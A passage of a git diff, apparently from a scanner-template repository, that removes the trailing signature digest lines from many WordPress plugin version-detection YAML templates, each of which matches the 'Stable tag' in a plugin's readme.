'(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022075886eaa19914e7fa648a774c07824f6f646bb6f78f42cf613fa93f61d5041ce0220212460f5844ed76624c1645fb99225b9c82166086f94631581d9b45896e06e3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 1195c7f890..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220067f065ca4ac2ae2b402ae5fb2f6a4c9418596968ae0e70dbc5467289d23a8a2022100cab431108cdf42b02b5fa17a6b61a981b7e2da05fdebda8ccd916499bcc3d74b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 030b087c15..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d8d0636ebc381cb9c5cc68a57083a021a92ce0d2515ecd41db039d06c2fae15702206c3800f4032f70ac17dbc054164f36b5dac8619c5b438ba6350a04ec9270e746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index e3f2f62202..c1a44066bb 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207f231313a1d7f784b0e3f8c1023e270e7e7ad9d8affa7c10691d0279e2c8046a022017328f9e794f377d1c79b3c66004ca6a978c0bbcc0f06b37f2f55b5f65986d3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 0bd692849d..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022037f7ddc8622c9375c607f3aea398224baadad8799054b4e4097a5c525c3b4b2402207f8ba20b1993492fc4879ea0f5879562e9550adedfbee559313068f01aed6b69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 97a6efbc08..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e11c7e70e5c1d1e94c749d32afcf738dcc7bf2cc1313baf5902d8140bd1e67c022100a377c62c748d58e77642cbcffe0db06ce05eac7fa83ab347bb770bfd2b07a644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 18031a5b6c..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205c722a2db9b5bb577a550ce2fc65acea3f6a493c428e574a01b445fe359ef6f6022100f0512ced065e8a3afc095d45b8623c2b5a00c75aaf30ba7d32f24f5d30222002:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 211b91de58..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022003162b98fd86043d276b893d434e544a1bf70aee96631097925028be714dae730220300b78c59b069a4bc96114b0b7119c5c2db7593a85c3a51030634255c3c2ae44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 729b3cf42f..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220648f754255dbb8cb1b9b92efbd46eff1f302c08f8b9bba143a1f5f68837a010d022049079fd8e295e8a4be0b7a56599f4139f1e9c672b709ded0f0c765b61dcc8c94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 92e564ee33..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201876aa141c3f36438f35055782eacd674ae72bf9d8529ba3f27ced64d2fa4e61022064396ad33a8067910327412dbb6ce90749645815c10e511a38b529d89d1b0c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 5ab5adecdc..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207bc74791c45989b7c2327ddf00f82d0509260ccd7f372a3b57e28f3931552dc1022100ac897eccd5264a204ae1b3c695bbe32cbe4944b7cbff1946312c226bb6cfb200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 38aee28a3d..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201595bde9d74a98503804e984f306ba373d45cb76a1f25e52f381fc09974bf9520221008f1e545e26618732cb8457ac9c9cc055146e63e7b9820849761a9b2eb25997c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index ace8e61e76..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b081e1db671ae56175e84751e3b4d381b5962173c62c39945c1a0074ce09619022058a430adc5d3e023d2a50303526c9815a414e8c8e90bf2d9d1da882602f9cba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index ac891af302..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009c31edd1d050d76c716de367a3218c3febfeaf516edc1bf7fc464df1f37ea830022100ba25e2580fef6ebe0b933a7cdabbf48aaee6c1aff048eec75e182ffc9ec6f4e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index f125b45b96..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e38426baf1d6e701c16b9344c2c9e8358bac269e1016841254d6de35b67673f902210086ca30819d86c6fe6fb023f58a677378b6cbb40a1a0c91ba6575ade57926b284:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 5231871726..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205fbda3ceffa667305b34f1e26d262b2b0d6b7092a99bf5a2238016786819b546022100da0e8e370f0d0a17409d4e83542a84356fd2aa7c36c358e676721199b0fc3f70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 328397c184..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220699dee988b509f1504fb7d2d27fd14446b75b04e92206532acec4f931b43a85402201cbcb6c6004eacb09e517bed7c96a8becb373babd93c1263080905ee7e87018e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 2ffb01e0c9..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022055c570a306e14aef5061d3702038f61b32e45bbc5fbb3e3800d023cedc84ef6d02204a1e93aa71a35203f2d32ebff57e917f5c4c564b9ad8ef655f0e5e66a2eebced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index ce396ac8ee..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204a8cfe8bc48d1cb177c39da9946def7d0ff5e6ae99028839dea265d2b655d0100220584e9ce7a9a820e7c4fe879179463fa7bd536b74188e2d7911983f5d7554cbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 9e8ba37515..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022009743b09f5ded8d5bb8efe56f902c6e9d49093ab12bf47030f077d07f114015a02205c32319fff5a09925f859b317f42392ba538bf662072d416a87fe83d54db0d0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 08f41ea846..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009b5ae666c801438058812bee24128bc06dd8fb458aa99f492503d86bf078e3fe022100e13917c05de1e0e8adb24f79d14e0f7e53e4710fc5736b7f9a53fa6171e795be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 1f148efa4d..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206bcd14c693d4ce99cc9187b2a391f8bc025336e520fb0144fa11db1fb92beb5d022100cdc0e6d3262106346ec79904dcb18fa6cb079519c5417a6fb2b29fb760a58e0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index ab06d52234..540d535ecc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203afb4bef84102db576209224b17ba7b56d46630a5a738b3da55d31eea4b240da02210089948d53a52c6b8311304bfe13f733022f0c72eaa9e4c7f8b6bfeef0104f8d67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 4c5a4d4b04..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f6f0a9947738aa004e48e59af1e7545d214415c04c4a77b1c5a5496185be94a102202c5038c67e0b2de8305c98a31e82a39557919c12db274381112b107954c3477a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 29879d220d..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d5f3e2cf2a2ec34a05524b395c28d60af629a32d279bc98b031773d60b436e35022100a258ad964aca58696f00fca0bca30e85c5bc07bf3a9fe9d9751d7c4f0c3fa82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index b5ba128d84..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c4732c97ea310ffc0a53ba44833b0ae5ca62fe22aff51c92938c2881c6ec3a88022100c23fb87212a84b3ca9f00f50da46788e785100b4354c0d082ac06fe4d48aff76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index b00ef43507..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cb507d5f187e5435cf6af3585831e79878faf3394823093019db843c41ff233802201e55ac555abfbeca39076ee5135347b6c2162ca33e3fd7226cf3c6b63284ae97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 829200684a..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e1945847cc2ac8eb9baccff20cb8bcc1f7c516553692ae474fdf2f21350efd5c0221008e23450659866cc6a77ad0e46ecf4c777c386501ba326e1dfc260f28d028b6f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 5115bb91c4..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb4a1eb6f37dba7eec69bf7939257f8816910d903698dcef654174351c9d406902206fdbb5140d18782dd047f63d0c2407c1186893eb6c1acec09c9f92b5af55f037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index b5a22bdb04..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b64a14b9550a8b5f2feafd320fb035b6a831405eaf691bcebd5897b4a118d28e022100a303e315845d92b76006b648b469969efef00393b854eee1509b36c9d842c737:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index ff66970fc1..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dce37376737526e452b890869d9367a2952c48bf1e032a20c84239f3ff0030c7022100889571451a44dda4506d0b6a3b764130e50a7ecf487d924d8b7f31bb44a826e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 52457a3e28..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210081a0a833e4f2ec15416f81e2f3644b3445d8dbb6586af505f25cfe02e32bcbf60220118ac13b9ec6f4d4bad79e2863e8afb2663d19752a0b800ea12d0ae4e1a7a1ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 0a9a30d3a3..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220190918a8756c2b849eee60b286f873c9e69920fd5c0d050ecca068acf675da2c02210082d83b6a9d1b6114adcb035a620cf52763f91c9f5de74664371889c9d3911a1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 050529ad9b..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203606afb5025caf90821ea609e814fd40d92578a0860515a422a71bdce7445a6802201fd6a963bc99bbc8ca6a7bf7a2e8e8b2fe5040165627c2bb7237868ff253c84b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 531da20729..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ba24d6ab0741e895a0e70dc0a9890ba287669afeccfecf7a40283aeb9da79b4002203203314dc6d7d254a1c1cd93255eaf137b22ccd7184a33d5eff25628f0a8c327:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index afc309fb98..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203435b372ebd877d2df427e8a369ea1b0b36e5de5560586c59ed1bb65788d472f022100a66c83672feb2c8e9b85cf5d2e48d2c37b8f9fba75bbb80dc938a8fc6137ca9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index eb34bdf842..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022053d6b5c37c2abb68332a0e5fe467d801420c9c750d801c4f2a09355af7a63ad4022100813e4b6dfbae25a0880f357be081aa2b74a628584ccbcad10e3485459cfc24ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 1587b23f4f..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100db3fcaa91854b34ada800de56b88cec39989917432b5dbfdd4de3b2a9abc65c90221008944dbdaca9ec62ec62ae67feb7fd957035862e9ba3a74fead68803912b81191:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 4d80ad13b5..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022078c20ae494f9445429acac1bdafa06f4bef8f36dff0223b2511d34ca40153e6802205e2d6bdb8999120c7a3e0a188f19fe42d99193629ec13110758cf9f3dad4d093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 15cc935666..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f5c346d4bad15e0ba0e4517e05807c38024b022662d804ad1b4d52ff2ed0f520221008497f8ae92a21b34d5f9809042e1ed72cde6e1ff0b887464e6177b1abffbf8a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 77ebc1726b..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e3f50c465226b28dcb053c425b6672e119c9b386536a921e52a6e7071f785eb50220032b2c3c86cf80879d3727d38824ec15f52fc42b26b99729e21741f8a1297c93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 6d8fe4f547..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fe24e91a37cba92c6ddf1a06c7ec3db57ec608a6272d1470ba7cde45c811bba8022100a16ee5c70cef98a6f98aa835d68ca3aedc63f288953ce9b93666365cc240df06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 677fd690f0..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206aa0eb93b24c04c826b228d45d5e42228d512a74b5314c077f0e1dc63b4281ee022076185ad6a5669ec6bb29864f83911cfde354b2be8221c569876ade7d9655d4a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index c48366c228..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd1b84028b246a824dfced2a676c83110b0e7b7cb698713b52cd4fcae7599a9a02210091bb2a2090b663e733e60a80733b20e365eb73a13e74ac89edf4ef2a75379fa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 2937a58e67..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022021d96d7cfde3329234c1c5ff11e91c7f3eea61ea1c4b7c31c79af04db1f04fca02205fe7cc8705b56652047b89ae4adaf751414c0f9b9d2f3e5f5a76b920d89a39e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index a03cc9afb6..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c72dd81d05aca2b6c00a313707873843fcf95396679988e86e5b4cc78fb26fa2022100e749e746ef0ba06937f77f0a881a71e2650ba05f37e435c999bbe743ebf13dd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index aeaeb15cf9..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a62c5df2fa894175b6ac6e45cc0995829735431dbdcf48607b157ea778c81b96022100bf575b5e88a3427c9e5694d678e9c13427157fb9367264e07f0d630d29617e2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 29c2828486..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100967fabfd356a624c69e61adfe8ad70b3faaf03123abb596ac90c9a77060a24d4022100ddbf2f4d688ba4b2a97b28cc26c50faf3ec37d7e60c42aea482054358f998762:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index eb61d411ef..39c497073c 100644 --- 